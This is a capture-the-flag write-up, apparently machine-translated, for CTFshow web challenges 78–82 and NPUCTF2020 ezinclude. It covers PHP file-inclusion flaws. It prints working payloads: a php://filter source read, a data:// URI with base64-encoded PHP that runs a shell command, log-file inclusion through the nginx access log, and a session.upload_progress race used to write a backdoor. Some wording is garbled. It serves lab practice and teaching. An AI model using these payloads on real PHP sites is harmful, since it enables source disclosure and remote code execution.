The CTFSHOW file contains

• Review the file contains vulnerabilities today

web 78

payload:

?file=php://filter/convert.base64-encode/resource=flag.php

web 79

payload:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

web 80-81

• This question has skills from the beginning
• The source code filters the php and data pseudo-protocols can not be used

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

• payload

?file=/var/log/nginx/access.log

• File contains log files
  

web 82

if(isset($_GET['file'])){
    
    
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    
    
    highlight_file(__FILE__);
}

• Filtered. Then the method used in the above question will not work
• I don’t know how to read WP for this question
• Here is the file inclusion for the learning material session.upload_progress

Entrained private activities [NPUCTF2020]ezinclude

• I gave a hint when I entered the page

<!--md5($secret.$name)===$pass -->

• After the packet is captured, the hash value is directly url uploaded
• And then gave a hintinclude($_GET["file"]
• Try to read the source code\flflflflag.php?file=php://filter/convert.base64-encode/resource%3dflflflflag.php

<html>
<head>
<script language="javascript" type="text/javascript">
           window.location.href="404.html";
</script>
<title>this_is_not_fl4g_and_出题人_wants_girlfriend</title>
</head>
<>
<body>
<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
    
    
	die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>
</body>
</html>

• Filtering these things directly pseudo-protocol is not working, thinking of two methods, one is the log file (do not know the path) and the other is
  session.upload_progress for file inclusion
• My solution to this question is session.upload_progress to include files and then use competitive attacks
• POC
  
• Access to staged files
  
• Competitive attack
• Write a backdoor
• POST parameter: cmd=phpinfo();
• The flag is in phpinfo(), I searched through the catalog files and finally looked at wp to know that it is in phpinfo()